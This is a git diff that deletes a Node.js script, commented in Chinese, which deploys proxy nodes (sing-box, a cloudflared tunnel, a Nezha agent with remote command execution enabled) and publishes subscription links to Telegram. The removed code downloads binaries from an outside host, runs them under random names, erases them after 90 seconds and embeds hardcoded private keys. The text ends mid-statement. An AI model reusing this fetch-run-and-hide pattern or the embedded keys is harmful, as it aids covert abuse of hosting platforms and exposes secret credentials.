diff --git "a/\346\220\255\345\273\272\350\212\202\347\202\271\347\232\204\350\204\232\346\234\254/index.js" "b/\346\220\255\345\273\272\350\212\202\347\202\271\347\232\204\350\204\232\346\234\254/index.js" index 9d59540..074b418 100644 --- "a/\346\220\255\345\273\272\350\212\202\347\202\271\347\232\204\350\204\232\346\234\254/index.js" +++ "b/\346\220\255\345\273\272\350\212\202\347\202\271\347\232\204\350\204\232\346\234\254/index.js" @@ -1,1051 +1 @@ -#!/usr/bin/env node - -const express = require("express"); -const app = express(); -const axios = require("axios"); -const os = require('os'); -const fs = require("fs"); -const path = require("path"); -const { promisify } = require('util'); -const exec = promisify(require('child_process').exec); -const { execSync } = require('child_process'); -const UPLOAD_URL = process.env.UPLOAD_URL || ''; // 订阅或节点自动上传地址,需填写部署Merge-sub项目后的首页地址,例如:https://merge.ct8.pl -const PROJECT_URL = process.env.PROJECT_URL || ''; // 需要上传订阅或保活时需填写项目分配的url,例如:https://google.com -const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // false关闭自动保活,true开启,需同时填写PROJECT_URL变量 -const YT_WARPOUT = process.env.YT_WARPOUT || false; // 设置为true时强制使用warp出站访问youtube,false时自动检测是否设置warp出站 -const FILE_PATH = process.env.FILE_PATH || '.npm'; // sub.txt订阅文件路径 -const SUB_PATH = process.env.SUB_PATH || 'sub'; // 订阅sub路径,默认为sub,例如:https://google.com/sub -const UUID = process.env.UUID || '0a6568ff-ea3c-4271-9020-450560e10d63'; // 在不同的平台运行了v1哪吒请修改UUID,否则会覆盖 -const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒面板地址,v1形式:nz.serv00.net:8008 v0形式:nz.serv00.net -const NEZHA_PORT = process.env.NEZHA_PORT || ''; // v1哪吒请留空,v0 agent端口,当端口为{443,8443,2087,2083,2053,2096}时,自动开启tls -const NEZHA_KEY = process.env.NEZHA_KEY || ''; // v1的NZ_CLIENT_SECRET或v0 agwnt密钥 -const ARGO_DOMAIN = process.env.ARGO_DOMAIN || ''; // argo固定隧道域名,留空即使用临时隧道 -const ARGO_AUTH = process.env.ARGO_AUTH || ''; // argo固定隧道token或json,留空即使用临时隧道 -const ARGO_PORT = process.env.ARGO_PORT || 8001; // argo固定隧道端口,使用token需在cloudflare控制台设置和这里一致,否则节点不通 -const TUIC_PORT = process.env.TUIC_PORT || ''; // 此处变量留空不变,此平台不支持直连 -const HY2_PORT = process.env.HY2_PORT || ''; // 此处变量留空不变,此平台不支持直连 -const REALITY_PORT = process.env.REALITY_PORT || ''; // 此处变量留空不变,此平台不支持直连 -const CFIP = process.env.CFIP || 'cdns.doon.eu.org'; // 优选域名或优选IP -const CFPORT = process.env.CFPORT || 443; // 优选域名或优选IP对应端口 -const PORT = process.env.PORT || 3000; // http订阅端口 -const NAME = process.env.NAME || ''; // 节点名称 -const CHAT_ID = process.env.CHAT_ID || ''; // Telegram chat_id 两个变量不全不推送节点到TG -const BOT_TOKEN = process.env.BOT_TOKEN || ''; // Telegram bot_token 两个变量不全不推送节点到TG - -//创建运行文件夹 -if (!fs.existsSync(FILE_PATH)) { - fs.mkdirSync(FILE_PATH); - console.log(`${FILE_PATH} is created`); -} else { - console.log(`${FILE_PATH} already exists`); -} - -let privateKey = ''; -let publicKey = ''; - -// 生成随机6位字符函数 -function generateRandomName() { - const chars = 'abcdefghijklmnopqrstuvwxyz'; - let result = ''; - for (let i = 0; i < 6; i++) { - result += chars.charAt(Math.floor(Math.random() * chars.length)); - } - return result; -} - -// 生成随机名称 -const npmRandomName = generateRandomName(); -const webRandomName = generateRandomName(); -const botRandomName = generateRandomName(); -const phpRandomName = generateRandomName(); - -// 使用随机文件名定义路径 -let npmPath = path.join(FILE_PATH, npmRandomName); -let phpPath = path.join(FILE_PATH, phpRandomName); -let webPath = path.join(FILE_PATH, webRandomName); -let botPath = path.join(FILE_PATH, botRandomName); -let subPath = path.join(FILE_PATH, 'sub.txt'); -let listPath = path.join(FILE_PATH, 'list.txt'); -let bootLogPath = path.join(FILE_PATH, 'boot.log'); -let configPath = path.join(FILE_PATH, 'config.json'); - -function deleteNodes() { - try { - if (!UPLOAD_URL) return; - - const subPath = path.join(FILE_PATH, 'sub.txt'); - if (!fs.existsSync(subPath)) return; - - let fileContent; - try { - fileContent = fs.readFileSync(subPath, 'utf-8'); - } catch { - return null; - } - - const decoded = Buffer.from(fileContent, 'base64').toString('utf-8'); - const nodes = decoded.split('\n').filter(line => - /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line) - ); - - if (nodes.length === 0) return; - - return axios.post(`${UPLOAD_URL}/api/delete-nodes`, - JSON.stringify({ nodes }), - { headers: { 'Content-Type': 'application/json' } } - ).catch((error) => { - return null; - }); - } catch (err) { - return null; - } -} - -// 端口验证函数 -function isValidPort(port) { - try { - if (port === null || port === undefined || port === '') return false; - if (typeof port === 'string' && port.trim() === '') return false; - - const portNum = parseInt(port); - if (isNaN(portNum)) return false; - if (portNum < 1 || portNum > 65535) return false; - - return true; - } catch (error) { - return false; - } -} - -//清理历史文件 -const pathsToDelete = [ webRandomName, botRandomName, npmRandomName, 'boot.log', 'list.txt']; -function cleanupOldFiles() { - pathsToDelete.forEach(file => { - const filePath = path.join(FILE_PATH, file); - fs.unlink(filePath, () => {}); - }); -} - - -// 根路由 -app.get("/", function(req, res) { - res.send("Hello world!"); -}); - -// 获取固定隧道json -function argoType() { - if (!ARGO_AUTH || !ARGO_DOMAIN) { - console.log("ARGO_DOMAIN or ARGO_AUTH variable is empty, use quick tunnels"); - return; - } - - if (ARGO_AUTH.includes('TunnelSecret')) { - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.json'), ARGO_AUTH); - const tunnelYaml = ` - tunnel: ${ARGO_AUTH.split('"')[11]} - credentials-file: ${path.join(FILE_PATH, 'tunnel.json')} - protocol: http2 - - ingress: - - hostname: ${ARGO_DOMAIN} - service: http://localhost:${ARGO_PORT} - originRequest: - noTLSVerify: true - - service: http_status:404 - `; - fs.writeFileSync(path.join(FILE_PATH, 'tunnel.yml'), tunnelYaml); - } else { - console.log("ARGO_AUTH mismatch TunnelSecret,use token connect to tunnel"); - } -} - -// 判断系统架构 -function getSystemArchitecture() { - const arch = os.arch(); - if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') { - return 'arm'; - } else { - return 'amd'; - } -} - -// 下载对应系统架构的依赖文件 -function downloadFile(fileName, fileUrl, callback) { - const filePath = path.join(FILE_PATH, fileName); - const writer = fs.createWriteStream(filePath); - - axios({ - method: 'get', - url: fileUrl, - responseType: 'stream', - }) - .then(response => { - response.data.pipe(writer); - - writer.on('finish', () => { - writer.close(); - console.log(`Download ${fileName} successfully`); - callback(null, fileName); - }); - - writer.on('error', err => { - fs.unlink(filePath, () => { }); - const errorMessage = `Download ${fileName} failed: ${err.message}`; - console.error(errorMessage); // 下载失败时输出错误消息 - callback(errorMessage); - }); - }) - .catch(err => { - const errorMessage = `Download ${fileName} failed: ${err.message}`; - console.error(errorMessage); // 下载失败时输出错误消息 - callback(errorMessage); - }); -} - -// 下载并运行依赖文件 -async function downloadFilesAndRun() { - const architecture = getSystemArchitecture(); - const filesToDownload = getFilesForArchitecture(architecture); - - if (filesToDownload.length === 0) { - console.log(`Can't find a file for the current architecture`); - return; - } - - // 修改文件名映射为使用随机名称 - const renamedFiles = filesToDownload.map(file => { - let newFileName; - if (file.fileName === 'npm') { - newFileName = npmRandomName; - } else if (file.fileName === 'web') { - newFileName = webRandomName; - } else if (file.fileName === 'bot') { - newFileName = botRandomName; - } else if (file.fileName === 'php') { - newFileName = phpRandomName; - } else { - newFileName = file.fileName; - } - return { ...file, fileName: newFileName }; - }); - - const downloadPromises = renamedFiles.map(fileInfo => { - return new Promise((resolve, reject) => { - downloadFile(fileInfo.fileName, fileInfo.fileUrl, (err, fileName) => { - if (err) { - reject(err); - } else { - resolve(fileName); - } - }); - }); - }); - - try { - await Promise.all(downloadPromises); // 等待所有文件下载完成 - } catch (err) { - console.error('Error downloading files:', err); - return; - } - - // 授权文件 - function authorizeFiles(filePaths) { - const newPermissions = 0o775; - filePaths.forEach(relativeFilePath => { - const absoluteFilePath = path.join(FILE_PATH, relativeFilePath); - if (fs.existsSync(absoluteFilePath)) { - fs.chmod(absoluteFilePath, newPermissions, (err) => { - if (err) { - console.error(`Empowerment failed for ${absoluteFilePath}: ${err}`); - } else { - console.log(`Empowerment success for ${absoluteFilePath}: ${newPermissions.toString(8)}`); - } - }); - } - }); - } - // 修改授权文件列表以使用随机名称 - const filesToAuthorize = NEZHA_PORT ? [npmRandomName, webRandomName, botRandomName] : [phpRandomName, webRandomName, botRandomName]; - authorizeFiles(filesToAuthorize); - - // 检测哪吒是否开启TLS - const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : ''; - const tlsPorts = new Set(['443', '8443', '2096', '2087', '2083', '2053']); - const nezhatls = tlsPorts.has(port) ? 'true' : 'false'; - - //运行ne-zha - if (NEZHA_SERVER && NEZHA_KEY) { - if (!NEZHA_PORT) { - // 生成 config.yaml - const configYaml = ` -client_secret: ${NEZHA_KEY} -debug: false -disable_auto_update: true -disable_command_execute: false -disable_force_update: true -disable_nat: false -disable_send_query: false -gpu: false -insecure_tls: true -ip_report_period: 1800 -report_delay: 4 -server: ${NEZHA_SERVER} -skip_connection_count: true -skip_procs_count: true -temperature: false -tls: ${nezhatls} -use_gitee_to_upgrade: false -use_ipv6_country_code: false -uuid: ${UUID}`; - - fs.writeFileSync(path.join(FILE_PATH, 'config.yaml'), configYaml); - } - } - - // 生成 reality-keypair - const keyFilePath = path.join(FILE_PATH, 'key.txt'); - - if (fs.existsSync(keyFilePath)) { - const content = fs.readFileSync(keyFilePath, 'utf8'); - const privateKeyMatch = content.match(/PrivateKey:\s*(.*)/); - const publicKeyMatch = content.match(/PublicKey:\s*(.*)/); - - privateKey = privateKeyMatch ? privateKeyMatch[1] : ''; - publicKey = publicKeyMatch ? publicKeyMatch[1] : ''; - - if (!privateKey || !publicKey) { - console.error('Failed to extract privateKey or publicKey from key.txt.'); - return; - } - - console.log('Private Key:', privateKey); - console.log('Public Key:', publicKey); - - continueExecution(); - } else { - // 修改执行命令以使用随机文件名 - exec(`${path.join(FILE_PATH, webRandomName)} generate reality-keypair`, async (err, stdout, stderr) => { - if (err) { - console.error(`Error generating reality-keypair: ${err.message}`); - return; - } - - const privateKeyMatch = stdout.match(/PrivateKey:\s*(.*)/); - const publicKeyMatch = stdout.match(/PublicKey:\s*(.*)/); - - privateKey = privateKeyMatch ? privateKeyMatch[1] : ''; - publicKey = publicKeyMatch ? publicKeyMatch[1] : ''; - - if (!privateKey || !publicKey) { - console.error('Failed to extract privateKey or publicKey from output.'); - return; - } - - // Save keys to key.txt - fs.writeFileSync(keyFilePath, `PrivateKey: ${privateKey}\nPublicKey: ${publicKey}\n`, 'utf8'); - - console.log('Private Key:', privateKey); - console.log('Public Key:', publicKey); - - continueExecution(); - }); - } - - function continueExecution() { - - exec('which openssl || where.exe openssl', async (err, stdout, stderr) => { - if (err || stdout.trim() === '') { - // OpenSSL 不存在,创建预定义的证书和私钥文件 - // console.log('OpenSSL not found, creating predefined certificate and key files'); - - // 创建 private.key 文件 - const privateKeyContent = `-----BEGIN EC PARAMETERS----- -BggqhkjOPQMBBw== ------END EC PARAMETERS----- ------BEGIN EC PRIVATE KEY----- -MHcCAQEEIM4792SEtPqIt1ywqTd/0bYidBqpYV/++siNnfBYsdUYoAoGCCqGSM49 -AwEHoUQDQgAE1kHafPj07rJG+HboH2ekAI4r+e6TL38GWASANnngZreoQDF16ARa -/TsyLyFoPkhLxSbehH/NBEjHtSZGaDhMqQ== ------END EC PRIVATE KEY-----`; - - fs.writeFileSync(path.join(FILE_PATH, 'private.key'), privateKeyContent); - // console.log('private.key has been created'); - - // 创建 cert.pem 文件 - const certContent = `-----BEGIN CERTIFICATE----- -MIIBejCCASGgAwIBAgIUfWeQL3556PNJLp/veCFxGNj9crkwCgYIKoZIzj0EAwIw -EzERMA8GA1UEAwwIYmluZy5jb20wHhcNMjUwOTE4MTgyMDIyWhcNMzUwOTE2MTgy -MDIyWjATMREwDwYDVQQDDAhiaW5nLmNvbTBZMBMGByqGSM49AgEGCCqGSM49AwEH -A0IABNZB2nz49O6yRvh26B9npACOK/nuky9/BlgEgDZ54Ga3qEAxdegEWv07Mi8h -aD5IS8Um3oR/zQRIx7UmRmg4TKmjUzBRMB0GA1UdDgQWBBTV1cFID7UISE7PLTBR -BfGbgkrMNzAfBgNVHSMEGDAWgBTV1cFID7UISE7PLTBRBfGbgkrMNzAPBgNVHRMB -Af8EBTADAQH/MAoGCCqGSM49BAMCA0cAMEQCIAIDAJvg0vd/ytrQVvEcSm6XTlB+ -eQ6OFb9LbLYL9f+sAiAffoMbi4y/0YUSlTtz7as9S8/lciBF5VCUoVIKS+vX2g== ------END CERTIFICATE-----`; - - fs.writeFileSync(path.join(FILE_PATH, 'cert.pem'), certContent); - // console.log('cert.pem has been created'); - } else { - // OpenSSL 存在,直接生成证书 - // console.log('OpenSSL found, generating certificate and key files'); - - // 生成 private.key 文件 - try { - await execPromise(`openssl ecparam -genkey -name prime256v1 -out "${path.join(FILE_PATH, 'private.key')}"`); - // console.log('private.key has been generated successfully'); - } catch (err) { - console.error(`Error generating private.key: ${err.message}`); - return; - } - - // 生成 cert.pem 文件 - try { - await execPromise(`openssl req -new -x509 -days 3650 -key "${path.join(FILE_PATH, 'private.key')}" -out "${path.join(FILE_PATH, 'cert.pem')}" -subj "/CN=bing.com"`); - // console.log('cert.pem has been generated successfully'); - } catch (err) { - console.error(`Error generating cert.pem: ${err.message}`); - return; - } - } - - // 确保 privateKey 和 publicKey 已经被正确赋值 - if (!privateKey || !publicKey) { - console.error('PrivateKey or PublicKey is missing, retrying...'); - return; - } - - // 生成sb配置文件 - const config = { - "log": { - "disabled": true, - "level": "error", - "timestamp": true - }, - "dns": { - "servers": [ - { - "address": "8.8.8.8", - "address_resolver": "local" - }, - { - "tag": "local", - "address": "local" - } - ] - }, - "inbounds": [ - { - "tag": "vmess-ws-in", - "type": "vmess", - "listen": "::", - "listen_port": ARGO_PORT, - "users": [ - { - "uuid": UUID - } - ], - "transport": { - "type": "ws", - "path": "/vmess-argo", - "early_data_header_name": "Sec-WebSocket-Protocol" - } - } - ], - "outbounds": [ - { - "type": "direct", - "tag": "direct" - }, - { - "type": "block", - "tag": "block" - }, - { - "type": "wireguard", - "tag": "wireguard-out", - "server": "engage.cloudflareclient.com", - "server_port": 2408, - "local_address": [ - "172.16.0.2/32", - "2606:4700:110:851f:4da3:4e2c:cdbf:2ecf/128" - ], - "private_key": "eAx8o6MJrH4KE7ivPFFCa4qvYw5nJsYHCBQXPApQX1A=", - "peer_public_key": "bmXOC+F1FxEMF9dyiK2H5/1SUtzH0JuVo51h2wPfgyo=", - "reserved": [82, 90, 51], - "mtu": 1420 - } - ], - "route": { - "rule_set": [ - { - "tag": "netflix", - "type": "remote", - "format": "binary", - "url": "https://raw.githubusercontent.com/MetaCubeX/meta-rules-dat/sing/geo/geosite/netflix.srs", - "download_detour": "direct" - }, - { - "tag": "openai", - "type": "remote", - "format": "binary", - "url": "https://raw.githubusercontent.com/MetaCubeX/meta-rules-dat/sing/geo/geosite/openai.srs", - "download_detour": "direct" - } - ], - "rules": [ - { - "rule_set": ["openai", "netflix"], - "outbound": "wireguard-out" - } - ], - "final": "direct" - } - }; - - // Reality配置 - try { - if (isValidPort(REALITY_PORT)) { - config.inbounds.push({ - "tag": "vless-in", - "type": "vless", - "listen": "::", - "listen_port": parseInt(REALITY_PORT), - "users": [ - { - "uuid": UUID, - "flow": "xtls-rprx-vision" - } - ], - "tls": { - "enabled": true, - "server_name": "www.iij.ad.jp", - "reality": { - "enabled": true, - "handshake": { - "server": "www.iij.ad.jp", - "server_port": 443 - }, - "private_key": privateKey, - "short_id": [""] - } - } - }); - } - } catch (error) { - // 忽略错误,继续运行 - } - - // Hysteria2配置 - try { - if (isValidPort(HY2_PORT)) { - config.inbounds.push({ - "tag": "hysteria-in", - "type": "hysteria2", - "listen": "::", - "listen_port": parseInt(HY2_PORT), - "users": [ - { - "password": UUID - } - ], - "masquerade": "https://bing.com", - "tls": { - "enabled": true, - "alpn": ["h3"], - "certificate_path": path.join(FILE_PATH, "cert.pem"), - "key_path": path.join(FILE_PATH, "private.key") - } - }); - } - } catch (error) { - // 忽略错误,继续运行 - } - - // TUIC配置 - try { - if (isValidPort(TUIC_PORT)) { - config.inbounds.push({ - "tag": "tuic-in", - "type": "tuic", - "listen": "::", - "listen_port": parseInt(TUIC_PORT), - "users": [ - { - "uuid": UUID - } - ], - "congestion_control": "bbr", - "tls": { - "enabled": true, - "alpn": ["h3"], - "certificate_path": path.join(FILE_PATH, "cert.pem"), - "key_path": path.join(FILE_PATH, "private.key") - } - }); - } - } catch (error) { - // 忽略错误,继续运行 - } - - // 检测YouTube可访问性并智能配置出站规则 - try { - // console.log(`YT_WARPOUT environment variable is set to: ${YT_WARPOUT}`); - let isYouTubeAccessible = true; - - // 如果YT_WARPOUT设置为true,则强制添加YouTube出站规则 - if (YT_WARPOUT === true) { - isYouTubeAccessible = false; - } else { - try { - // 尝试使用curl检测 - const youtubeTest = execSync('curl -o /dev/null -m 2 -s -w "%{http_code}" https://www.youtube.com', { encoding: 'utf8' }).trim(); - isYouTubeAccessible = youtubeTest === '200'; - // console.log(`YouTube access check result: ${isYouTubeAccessible ? 'accessible' : 'inaccessible'}`); - } catch (curlError) { - // 如果curl失败,检查输出中是否包含状态码 - if (curlError.output && curlError.output[1]) { - const youtubeTest = curlError.output[1].toString().trim(); - isYouTubeAccessible = youtubeTest === '200'; - } else { - isYouTubeAccessible = false; - } - // console.log(`YouTube access check failed, assuming inaccessible`); - } - } - // 当YouTube不可访问或YT_WARPOUT设置为true时添加出站规则 - if (!isYouTubeAccessible) { - // console.log('YouTube cannot be accessed or YT_WARPOUT is enabled, adding outbound rules...'); - - // 确保route结构完整 - if (!config.route) { - config.route = {}; - } - if (!config.route.rule_set) { - config.route.rule_set = []; - } - if (!config.route.rules) { - config.route.rules = []; - } - - // 检查是否已存在YouTube规则集 - const existingYoutubeRule = config.route.rule_set.find(rule => rule.tag === 'youtube'); - if (!existingYoutubeRule) { - config.route.rule_set.push({ - "tag": "youtube", - "type": "remote", - "format": "binary", - "url": "https://raw.githubusercontent.com/MetaCubeX/meta-rules-dat/sing/geo/geosite/youtube.srs", - "download_detour": "direct" - }); - // console.log('Add YouTube outbound successfully'); - } else { - // console.log('YouTube rule set already exists'); - } - - // 查找wireguard-out规则 - let wireguardRule = config.route.rules.find(rule => rule.outbound === 'wireguard-out'); - if (!wireguardRule) { - // 如果不存在wireguard-out规则,创建一个 - wireguardRule = { - "rule_set": ["openai", "netflix", "youtube"], - "outbound": "wireguard-out" - }; - config.route.rules.push(wireguardRule); - // console.log('Created new wireguard-out rule with YouTube'); - } else { - // 如果规则集中没有youtube,则添加 - if (!wireguardRule.rule_set.includes('youtube')) { - wireguardRule.rule_set.push('youtube'); - // console.log('Added YouTube to existing wireguard-out rule'); - } else { - // console.log('YouTube already exists in wireguard-out rule'); - } - } - - console.log('Add YouTube outbound rule'); - } else { - // console.log('YouTube is accessible and YT_WARPOUT is not enabled, no need to add outbound rule'); - } - } catch (error) { - console.error('YouTube check error:', error); - // ignore YouTube check error, continue running - } - - fs.writeFileSync(path.join(FILE_PATH, 'config.json'), JSON.stringify(config, null, 2)); - - // 运行ne-zha - let NEZHA_TLS = ''; - if (NEZHA_SERVER && NEZHA_PORT && NEZHA_KEY) { - const tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053']; - if (tlsPorts.includes(NEZHA_PORT)) { - NEZHA_TLS = '--tls'; - } else { - NEZHA_TLS = ''; - } - const command = `nohup ${path.join(FILE_PATH, npmRandomName)} -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`; - try { - await execPromise(command); - console.log('npm is running'); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`npm running error: ${error}`); - } - } else if (NEZHA_SERVER && NEZHA_KEY) { - // 运行 V1 - const command = `nohup ${FILE_PATH}/${phpRandomName} -c "${FILE_PATH}/config.yaml" >/dev/null 2>&1 &`; - try { - await exec(command); - console.log('php is running'); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`php running error: ${error}`); - } - } else { - console.log('NEZHA variable is empty, skipping running'); - } - - // 运行sbX - // 修改执行命令以使用随机文件名 - const command1 = `nohup ${path.join(FILE_PATH, webRandomName)} run -c ${path.join(FILE_PATH, 'config.json')} >/dev/null 2>&1 &`; - try { - await execPromise(command1); - console.log('web is running'); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`web running error: ${error}`); - } - - // 运行cloud-fared - // 修改检查和执行命令以使用随机文件名 - if (fs.existsSync(path.join(FILE_PATH, botRandomName))) { - let args; - - if (ARGO_AUTH.match(/^[A-Z0-9a-z=]{120,250}$/)) { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 run --token ${ARGO_AUTH}`; - } else if (ARGO_AUTH.match(/TunnelSecret/)) { - args = `tunnel --edge-ip-version auto --config ${path.join(FILE_PATH, 'tunnel.yml')} run`; - } else { - args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${path.join(FILE_PATH, 'boot.log')} --loglevel info --url http://localhost:${ARGO_PORT}`; - } - - try { - await execPromise(`nohup ${path.join(FILE_PATH, botRandomName)} ${args} >/dev/null 2>&1 &`); - console.log('bot is running'); - await new Promise((resolve) => setTimeout(resolve, 2000)); - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - await new Promise((resolve) => setTimeout(resolve, 5000)); - - // 提取域名并生成sub.txt文件 - await extractDomains(); - }); - }; -} - -// 执行命令的Promise封装 -function execPromise(command) { - return new Promise((resolve, reject) => { - exec(command, (error, stdout, stderr) => { - if (error) { - reject(error); - } else { - resolve(stdout || stderr); - } - }); - }); -} - -// 根据系统架构返回对应的url -function getFilesForArchitecture(architecture) { - let baseFiles; - if (architecture === 'arm') { - baseFiles = [ - { fileName: "web", fileUrl: "https://arm64.ssss.nyc.mn/sb" }, - { fileName: "bot", fileUrl: "https://arm64.ssss.nyc.mn/bot" } - ]; - } else { - baseFiles = [ - { fileName: "web", fileUrl: "https://amd64.ssss.nyc.mn/sb" }, - { fileName: "bot", fileUrl: "https://amd64.ssss.nyc.mn/bot" } - ]; - } - - if (NEZHA_SERVER && NEZHA_KEY) { - if (NEZHA_PORT) { - const npmUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/agent" - : "https://amd64.ssss.nyc.mn/agent"; - baseFiles.unshift({ - fileName: "npm", - fileUrl: npmUrl - }); - } else { - const phpUrl = architecture === 'arm' - ? "https://arm64.ssss.nyc.mn/v1" - : "https://amd64.ssss.nyc.mn/v1"; - baseFiles.unshift({ - fileName: "php", - fileUrl: phpUrl - }); - } - } - - return baseFiles; -} - -// 获取临时隧道domain -async function extractDomains() { - let argoDomain; - - if (ARGO_AUTH && ARGO_DOMAIN) { - argoDomain = ARGO_DOMAIN; - console.log('ARGO_DOMAIN:', argoDomain); - await generateLinks(argoDomain); - } else { - try { - const fileContent = fs.readFileSync(path.join(FILE_PATH, 'boot.log'), 'utf-8'); - const lines = fileContent.split('\n'); - const argoDomains = []; - lines.forEach((line) => { - const domainMatch = line.match(/https?:\/\/([^ ]*trycloudflare\.com)\/?/); - if (domainMatch) { - const domain = domainMatch[1]; - argoDomains.push(domain); - } - }); - - if (argoDomains.length > 0) { - argoDomain = argoDomains[0]; - console.log('ArgoDomain:', argoDomain); - await generateLinks(argoDomain); - } else { - console.log('ArgoDomain not found, re-running bot to obtain ArgoDomain'); - // 删除 boot.log 文件,等待 2s 重新运行 server 以获取 ArgoDomain - fs.unlinkSync(path.join(FILE_PATH, 'boot.log')); - async function killBotProcess() { - try { - await exec(`pkill -f "${botRandomName}" > /dev/null 2>&1`); - } catch (error) { - return null; - // 忽略输出 - } - } - killBotProcess(); - await new Promise((resolve) => setTimeout(resolve, 1000)); - const args = `tunnel --edge-ip-version auto --no-autoupdate --protocol http2 --logfile ${FILE_PATH}/boot.log --loglevel info --url http://localhost:${ARGO_PORT}`; - try { - await exec(`nohup ${path.join(FILE_PATH, botRandomName)} ${args} >/dev/null 2>&1 &`); - console.log('bot is running.'); - await new Promise((resolve) => setTimeout(resolve, 6000)); // 等待6秒 - await extractDomains(); // 重新提取域名 - } catch (error) { - console.error(`Error executing command: ${error}`); - } - } - } catch (error) { - console.error('Error reading boot.log:', error); - } - } -} - - // 生成 list 和 sub 信息 - async function generateLinks(argoDomain) { - let SERVER_IP = ''; - try { - SERVER_IP = execSync('curl -s --max-time 2 ipv4.ip.sb').toString().trim(); - } catch (err) { - try { - SERVER_IP = `[${execSync('curl -s --max-time 1 ipv6.ip.sb').toString().trim()}]`; - } catch (ipv6Err) { - console.error('Failed to get IP address:', ipv6Err.message); - } - } - - const metaInfo = execSync( - 'curl -s https://speed.cloudflare.com/meta | awk -F\\" \'{print $26"-"$18}\' | sed -e \'s/ /_/g\'', - { encoding: 'utf-8' } - ); - const ISP = metaInfo.trim(); - - const nodeName = NAME ? `${NAME}-${ISP}` : ISP; - - return new Promise((resolve) => { - setTimeout(() => { - const vmessNode = `vmess://${Buffer.from(JSON.stringify({ v: '2', ps: `${nodeName}`, add: CFIP, port: CFPORT, id: UUID, aid: '0', scy: 'none', net: 'ws', type: 'none', host: argoDomain, path: '/vmess-argo?ed=2560', tls: 'tls', sni: argoDomain, alpn: '', fp: 'firefox'})).toString('base64')}`; - - let subTxt = vmessNode; // 始终生成vmess节点 - - // TUIC_PORT是有效端口号时生成tuic节点 - if (isValidPort(TUIC_PORT)) { - const tuicNode = `\ntuic://${UUID}:@${SERVER_IP}:${TUIC_PORT}?sni=www.bing.com&congestion_control=bbr&udp_relay_mode=native&alpn=h3&allow_insecure=1#${nodeName}`; - subTxt += tuicNode; - } - - // HY2_PORT是有效端口号时生成hysteria2节点 - if (isValidPort(HY2_PORT)) { - const hysteriaNode = `\nhysteria2://${UUID}@${SERVER_IP}:${HY2_PORT}/?sni=www.bing.com&insecure=1&alpn=h3&obfs=none#${nodeName}`; - subTxt += hysteriaNode; - } - - // REALITY_PORT是有效端口号时生成reality节点 - if (isValidPort(REALITY_PORT)) { - const vlessNode = `\nvless://${UUID}@${SERVER_IP}:${REALITY_PORT}?encryption=none&flow=xtls-rprx-vision&security=reality&sni=www.iij.ad.jp&fp=firefox&pbk=${publicKey}&type=tcp&headerType=none#${nodeName}`; - subTxt += vlessNode; - } - - // 打印 sub.txt 内容到控制台 - console.log(Buffer.from(subTxt).toString('base64')); - fs.writeFileSync(subPath, Buffer.from(subTxt).toString('base64')); - fs.writeFileSync(listPath, subTxt, 'utf8'); - console.log(`${FILE_PATH}/sub.txt saved successfully`); - sendTelegram(); // 发送tg消息提醒 - uplodNodes(); // 推送节点到订阅器 - // 将内容进行 base64 编码并写入 SUB_PATH 路由 - app.get(`/${SUB_PATH}`, (req, res) => { - const encodedContent = Buffer.from(subTxt).toString('base64'); - res.set('Content-Type', 'text/plain; charset=utf-8'); - res.send(encodedContent); - }); - resolve(subTxt); - }, 2000); - }); - } - -// 90s分钟后删除相关文件 -function cleanFiles() { - setTimeout(() => { - const filesToDelete = [bootLogPath, configPath, listPath, webPath, botPath, phpPath, npmPath]; - - if (NEZHA_PORT) { - filesToDelete.push(npmPath); - } else if (NEZHA_SERVER && NEZHA_KEY) { - filesToDelete.push(phpPath); - } - - // 修改为使用随机文件名删除文件 - const filePathsToDelete = filesToDelete.map(file => { - // 对于已经使用随机路径的变量,直接使用 - if ([webPath, botPath, phpPath, npmPath].includes(file)) { - return file; - } - // 对于其他文件,使用原始路径 - return path.join(FILE_PATH, path.basename(file)); - }); - - exec(`rm -rf ${filePathsToDelete.join(' ')} >/dev/null 2>&1`, (error) => { - console.clear(); - console.log('App is running'); - console.log('Thank you for using this script, enjoy!'); - }); - }, 90000); // 90s -} - -async function sendTelegram() { - if (!BOT_TOKEN || !CHAT_ID) { - console.log('TG variables is empty,Skipping push nodes to TG'); - return; - } - try { - const message = fs.readFileSync(path.join(FILE_PATH, 'sub.txt'), 'utf8'); - const url = `https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`; - - const escapedName = NAME.replace(/[_*[\]()~`>#+=|{}.!-]/g, '\\$&'); - - const params = { - chat_id: CHAT_ID, - text: `**${escapedName}节点推送通知**\n\`\`\`${message}\`\`\``, - parse_mode: 'MarkdownV2' - }; - - await axios.post(url, null, { params }); - console.log('Telegram message sent successfully'); - } catch (error) { - console.error('Failed to send Telegram message', error); - } -} - -async function uplodNodes() { - if (UPLOAD_URL && PROJECT_URL) { - const subscriptionUrl = `${PROJECT_URL}/${SUB_PATH}`; - const jsonData = { - subscription: [subscriptionUrl] - }; - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-subscriptions`, jsonData, { - headers: { - 'Content-Type': 'application/json' - } - }); - - if (response.status === 200) { - console.log('Subscription uploaded successfully'); - } else { - return null; - } - } catch (error) { - if (error.response) { - if (error.response.status === 400) { - } - } - } - } else if (UPLOAD_URL) { - if (!fs.existsSync(listPath)) return; - const content = fs.readFileSync(listPath, 'utf-8'); - const nodes = content.split('\n').filter(line => /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line)); - - if (nodes.length === 0) return; - - const jsonData = JSON.stringify({ nodes }); - - try { - const response = await axios.post(`${UPLOAD_URL}/api/add-nodes`, jsonData, { 